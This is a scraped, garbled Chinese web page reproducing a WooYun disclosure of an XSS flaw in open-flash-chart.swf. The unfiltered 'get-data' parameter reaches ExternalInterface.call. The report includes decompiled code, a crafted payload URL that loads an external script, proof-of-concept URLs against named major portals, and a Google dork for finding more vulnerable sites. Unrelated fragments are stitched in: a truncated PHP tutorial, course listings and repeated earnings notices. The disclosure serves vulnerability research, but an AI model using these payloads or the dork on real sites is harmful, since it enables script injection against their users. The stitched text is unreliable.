open openflashchart2 chart2 做...

来源:蜘蛛抓取(WebSpider) 时间:2011-09-16 19:48 标签: openflashchart2
轻松一扫,精彩不停
购买量排行
已有38人报名
已有7人报名
已有5人报名
课程价格9.90元分享漏洞:
披露状态:
: 积极联系厂商并且等待厂商认领中,细节不对外公开
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
和我之前发的 JWPlayer 存在同样的问题。利用方法也类似,就是地址栏里的参数不一样。 这个程序的使用范围之广,我就不多了说了。连乌云都是用的此图表程序,不过乌云比较幸运的是,用的旧版本,不存在此问题。
我随手搜索了一下 open-flash-chart.swf
域名下也存在该文件。
google: inurl:(open-flash-chart.swf) site:.cn 也可以看看有多少记录。
不难想象,图表演示程序,多用于数据统计,所以非常可能被广泛应用于商务方面的网站。
至于XSS的危害,单个文件存在XSS不可怕,但是当存在问题的FLASH文件广泛存在于网上的时候,就不一样了。
详细说明:
1. 漏洞问题出现在
package main
private function callExternalCallback(_arg1:String, ... _args){
if (ExternalInterface.available){
return (ExternalInterface.call(_arg1, _args));
可以此处看到,建立了一个callExternalCallback函数。
2. 我们再搜索callExternalCallback,会找到以下有问题的部分。
code 区域var _local2 = &open_flash_chart_data&;
if (this.chart_parameters[&get-data&]){
_local2 = this.chart_parameters[&get-data&];
if (this.chart_parameters[&id&]){
_local3 = this.callExternalCallback(_local2, this.chart_parameters[&id&]);
_local3 = this.callExternalCallback(_local2);
从代码里可以看到, 直接call了_local2,而_local2来自于get-data参数
因此我们可以构造以下代码。 以open flash chart 官网的SWF为例:
code 区域/sites/all/files/ofc_core/open-flash-chart.swf?get-data=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D)
漏洞证明:
网易:(嘿嘿,jwplayer你没中招, 这次你中弹了吧~,虽然不是什么重要的域名)
http://db./flash/open-flash-chart.swf?get-data=alert
腾讯:你也中招了, 商务网站的哦~
/misc/seller/open-flash-chart.swf?get-data=alert
新浪:也有
http://data..cn/images/price_trend/open-flash-chart.swf?get-data=alert
http://soccer./StyleDefault/Media/open-flash-chart.swf?get-data=alert
/static/flash/open-flash-chart.swf?get-data=alert
其它的我就不找了。
修复方案:
这个,各厂商自己看着办吧!! 学学Facebook,把 ExternalInterface.call 自己封装了一下,对传入参数进行了严格的过滤!
版权声明:转载请注明来源 @
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:6 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
乌云真幸运~
这个swf确实纠结了。。。
以前的站都是可以上传swf,估计都得禁止上传了。。。
@Jannock 可以给gainover核心白帽子了
@蟋蟀哥哥 不是我给的。。。
冒个泡= =。 支持一下
缺陷关联:
(Flash编程安全)
@xsser 是不是应该放鞭炮播首歌庆贺一下-_-||
@蟋蟀哥哥 早已经是了
@一刀终情 我不是啊
@蟋蟀哥哥 你说的给gainover 撒~
gainover牛哦
12年的漏洞。13年了还没有补。
登录后才能发表评论,请先>1.open flash chart是一种比较实用的图标呈现插件,而且是开源的,介绍下open flash chart使用。&2.FlashChart类FlashChart Class Codeclass FlashChart { private $ private $ private $ private $ function __construct($path="",$width=300,$height=500,$id="myChart") { global $flash_ $this->id=$ $this->height=$ $this->width=$ $this->path=$ if(!$flash_chart) { echo '
上一篇:下一篇:
相关经验教程
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益扫描二维码用手机看文章

我要回帖

更多关于 openflashchart2 的文章

 

随机推荐